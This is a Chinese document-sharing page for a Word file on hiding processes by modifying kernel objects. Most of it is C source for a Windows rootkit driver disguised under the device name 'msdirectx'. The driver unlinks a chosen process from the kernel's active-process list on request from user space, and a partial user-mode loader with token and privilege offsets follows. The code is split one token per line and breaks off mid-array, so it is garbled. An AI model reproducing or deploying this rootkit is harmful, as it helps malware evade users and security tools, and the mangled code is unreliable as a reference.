直接修改内核对象隐藏进程Word文档下载推荐.docx
- 文档编号:19178465
- 上传时间:2023-01-04
- 格式:DOCX
- 页数:20
- 大小:21.33KB
直接修改内核对象隐藏进程Word文档下载推荐.docx
《直接修改内核对象隐藏进程Word文档下载推荐.docx》由会员分享,可在线阅读,更多相关《直接修改内核对象隐藏进程Word文档下载推荐.docx(20页珍藏版)》请在冰豆网上搜索。
typedef
BOOLEAN
BOOL;
unsigned
long
DWORD;
DWORD
*
PDWORD;
#define
FILE_DEVICE_ROOTKIT
0x00002a7b
IOCTL_ROOTKIT_INIT
(ULONG)
CTL_CODE(FILE_DEVICE_ROOTKIT,
0x01,
METHOD_BUFFERED,
FILE_WRITE_ACCESS)
IOCTL_ROOTKIT_HIDEME
0x02,
int
FLINKOFFSET;
PIDOFFSET;
PDEVICE_OBJECT
g_RootkitDevice;
const
WCHAR
deviceLinkBuffer[]
=
L"
\\DosDevices\\msdirectx"
;
deviceNameBuffer[]
\\Device\\msdirectx"
DebugPrint
DbgPrint
FindProcessEPROC(int);
//遍历链表寻找要隐藏的进程的函数
NTSTATUS
RootkitDispatch(IN
PDEVICE_OBJECT,
IN
PIRP);
RootkitUnload(IN
PDRIVER_OBJECT);
RootkitDeviceControl(IN
PFILE_OBJECT,
BOOLEAN,
PVOID,
ULONG,
OUT
PIO_STATUS_BLOCK,
PDEVICE_OBJECT
);
DriverEntry(
PDRIVER_OBJECT
DriverObject,
PUNICODE_STRING
RegistryPath
)
{
ntStatus;
UNICODE_STRING
deviceNameUnicodeString;
deviceLinkUnicodeString;
RtlInitUnicodeString
(&
deviceNameUnicodeString,
deviceNameBuffer
deviceLinkUnicodeString,
deviceLinkBuffer
ntStatus
IoCreateDevice
(
0,
//
For
driver
extension
&
FILE_DEVICE_ROOTKIT,
0,
TRUE,
g_RootkitDevice
if(
NT_SUCCESS(ntStatus))
IoCreateSymbolicLink
deviceNameUnicodeString
DriverObject->
MajorFunction[IRP_MJ_SHUTDOWN]
=
MajorFunction[IRP_MJ_CREATE]
MajorFunction[IRP_MJ_CLOSE]
MajorFunction[IRP_MJ_DEVICE_CONTROL]
RootkitDispatch;
DriverUnload
RootkitUnload;
}
else
DebugPrint(("
Failed
to
create
device!
\n"
));
return
STATUS_SUCCESS;
DriverObject)
p_NextObj;
p_NextObj
DeviceObject;
if
(p_NextObj
!
NULL)
RtlInitUnicodeString(
deviceLinkUnicodeString,
IoDeleteSymbolicLink(
deviceLinkUnicodeString
IoDeleteDevice(
DeviceObject
RootkitDispatch(
DeviceObject,
PIRP
Irp
PIO_STACK_LOCATION
irpStack;
PVOID
inputBuffer;
outputBuffer;
ULONG
inputBufferLength;
outputBufferLength;
ioControlCode;
ntstatus;
ntstatus
Irp->
IoStatus.Status
IoStatus.Information
0;
irpStack
IoGetCurrentIrpStackLocation
(Irp);
inputBuffer
AssociatedIrp.SystemBuffer;
inputBufferLength
irpStack->
Parameters.DeviceIoControl.InputBufferLength;
outputBuffer
outputBufferLength
Parameters.DeviceIoControl.OutputBufferLength;
ioControlCode
Parameters.DeviceIoControl.IoControlCode;
switch
(irpStack->
MajorFunction)
case
IRP_MJ_CREATE:
break;
IRP_MJ_SHUTDOWN:
IRP_MJ_CLOSE:
IRP_MJ_DEVICE_CONTROL:
RootkitDeviceControl(
FileObject,
inputBuffer,
inputBufferLength,
outputBuffer,
outputBufferLength,
ioControlCode,
IoStatus,
IoCompleteRequest(
Irp,
IO_NO_INCREMENT
NTSTATUS
RootkitDeviceControl(
PFILE_OBJECT
Wait,
InputBuffer,
InputBufferLength,
OutputBuffer,
OutputBufferLength,
IoControlCode,
PIO_STATUS_BLOCK
)
find_PID
eproc
0x00000000;
start_eproc=
PLIST_ENTRY
plist_active_procs
NULL;
IoStatus->
Status
Information
IoControlCode
IOCTL_ROOTKIT_INIT:
((InputBufferLength
<
sizeof(int)
8)
||
(InputBuffer
==
NULL))
STATUS_INVALID_BUFFER_SIZE;
PIDOFFSET
(int)
(*(int
*)InputBuffer);
//从用户空间得到PID和FLINKOFFSET
FLINKOFFSET
(*((int
*)InputBuffer+1));
IOCTL_ROOTKIT_HIDEME:
sizeof(DWORD))
*((DWORD
//从用户空间程序得到隐藏进程ID号
(find_PID
0x00000000)
STATUS_INVALID_PARAMETER;
FindProcessEPROC(find_PID);
//通过ID号找到对应进程
(eproc
(LIST_ENTRY
*)
(eproc+FLINKOFFSET);
//隐藏进程
*)plist_active_procs->
Blink)
(DWORD)
plist_active_procs->
Flink;
Flink+1)
Blink;
default:
STATUS_INVALID_DEVICE_REQUEST;
Status;
FindProcessEPROC
(int
terminate_PID)
current_PID
start_PID
i_count
plist_active_procs;
(terminate_PID
0)
terminate_PID;
PsGetCurrentProcess();
//得到当前进程的PLIST_ENTRY
*((DWORD*)(eproc+PIDOFFSET));
//PIDOFFSET为PLIST_ENTRY中保存进程ID的偏移量。
start_PID;
while
(1)//遍历链表比较进程ID找到要隐藏的进程的PLIST_ENTRY
if(terminate_PID
current_PID)
eproc;
if((i_count
>
1)
(start_PID
current_PID))
-
*((int
*)(eproc+PIDOFFSET));
i_count++;
2
用户空间程序
stdafx.h"
windows.h>
stdio.h>
process.h>
tlhelp32.h>
string.h>
winioctl.h>
winsvc.h>
tchar.h>
stdlib.h>
SECURITY_STRING_LEN
168
LG_PAGE_SIZE
4096
MAX_KEY_LENGTH
1024
LG_SLEEP_TIME
4000
HANDLE
gh_Device
INVALID_HANDLE_VALUE;
static
CHAR
ac_driverLabel[]="
msdirectx"
ac_driverName[]="
msdirectx.sys"
pid;
h_Device
d_bytesRead,
d_error;
ac_driverPath[MAX_PATH];
BOOL
bOsVersionInfoEx;
Found
FALSE;
acModulePath[MAX_PATH];
pid_offset
flink_offset
authid_offset
token_offset
privcount_offset
privaddr_offset
sidcount_offset
sidaddr_offset
char
m_szDriverExt[MAX_PATH];
DriverName[MAX_PATH];
sz_drivername[MAX_PATH];
m_szDriverFullPath[MAX_PATH];
PROCESSENTRY32
stProcess;
BYTE
g_szSecurity[SECURITY_STRING_LEN]=
0x01,0x00,0x14,0x80,0x90,0x00,0x00,0x00,0x9c,0x00,0x00,0x00,0x14,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x02,
0x00,0x1c,0x00,0x01,0x00,0x00,0x00,0x02,0x80,0x14,0x00,0xff,0x01,0x0f,0x00,0x01,0x01,0x00,0x00,0x00,0x00,
0x00,0x01,0x00,0x00,0x00,0x00,0x02,0x00,0x60,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x14,0x00,0xfd,0x01,0x02,
0x00,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x05,0x12,0x00,0x00,0x00,0x00,0x00,0x18,0x00,0xff,0x01,0x0f,0x00,
0x01,0x02,0x00,0x00,0x00,0x00,0x00,0x05,0x20,0x00,0x00,0x00,0x20,0x02,0x00,0x00,0x00,0x00,0x14,0x00,0x8d,
0x01,0x02,0x00,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x05,0x0b,0x00,0x00,0x00,0x00,0x00,0x18,0x00,0xfd,0x01,
0x02,0x00,0x01,0x02,0x00,0x00,0x00,0x00,0x00,0x05,0x20,0x00,0x00,0x00,0x23,0x02,0x00,0x00,0x01,0x01,0x00,
0x00,0x00
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 直接 修改 内核 对象 隐藏 进程